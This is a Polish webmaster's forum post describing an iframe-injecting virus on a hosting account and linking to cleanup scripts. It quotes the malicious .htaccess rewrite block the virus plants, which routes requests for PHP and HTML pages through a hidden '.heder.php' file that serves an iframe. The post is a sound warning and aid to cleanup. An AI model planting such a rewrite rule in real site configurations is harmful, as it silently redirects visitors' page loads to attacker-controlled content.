Uwaga wirusy w IFRAME, chiraglpatel.office-on-the.net

[XUMI.pl]

Witam,

Niestety trafiło mi się na jednym z hostingów nieprzyjemne zjawisko (dopisywanie kodu przez wirusa).

Wiem, że jest jeden temat opisujący podobny problem ale tworze ten temat bo uważam, że łatwiej będzie komuś znaleźć rozwiązanie.

Skrypt tworzy .htaccess lub dodaje się do istniejącego pliku i dodaje kod:

> #mmmmd

> <IfModule mod_rewrite.c>

> RewriteEngine On

> RewriteCond %{REQUEST_METHOD} GET

> RewriteCond %{REQUEST_FILENAME} -f

> RewriteCond %{REQUEST_FILENAME} !.heder.php

> RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml)

> \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]

> </IfModule>

W .header.php jest dodany skrypt wyświetlający iframe.

Wirus umieszcza się w min do 4 lvl (z tego co zaobserwowałem)

Dodaje się też do wszystkich plików .html oraz plików ze słowem index

Logi z ftp pozwoliły mi zaobserwować iż połączenia z ftp są z botnetu (wiele IP rozłożone w czasie)

Przydatne narzędzia:

1. https://wklej.org/id/149954/ skrypt pozwalający wyszukiwać strony z iframe

2. https://wklej.org/id/149956/ skrypt wyświetlający pliki posiadające w sobie wirusa

3. https://wklej.org/id/149958/ skrypt usuwający wirusa

Mam nadzieje, że komuś się przydadzą te pliki i informacje podane powyżej.

Edit: w pliku 2 i 3 proszę podmienić sobie ścieżkę w clear_cache_recursive('tutaj-twoja-sciezka'); , jeśli ktoś chce szukać w całym hostingu to wystarczy ustawić '/' i powinno działać poprawnie.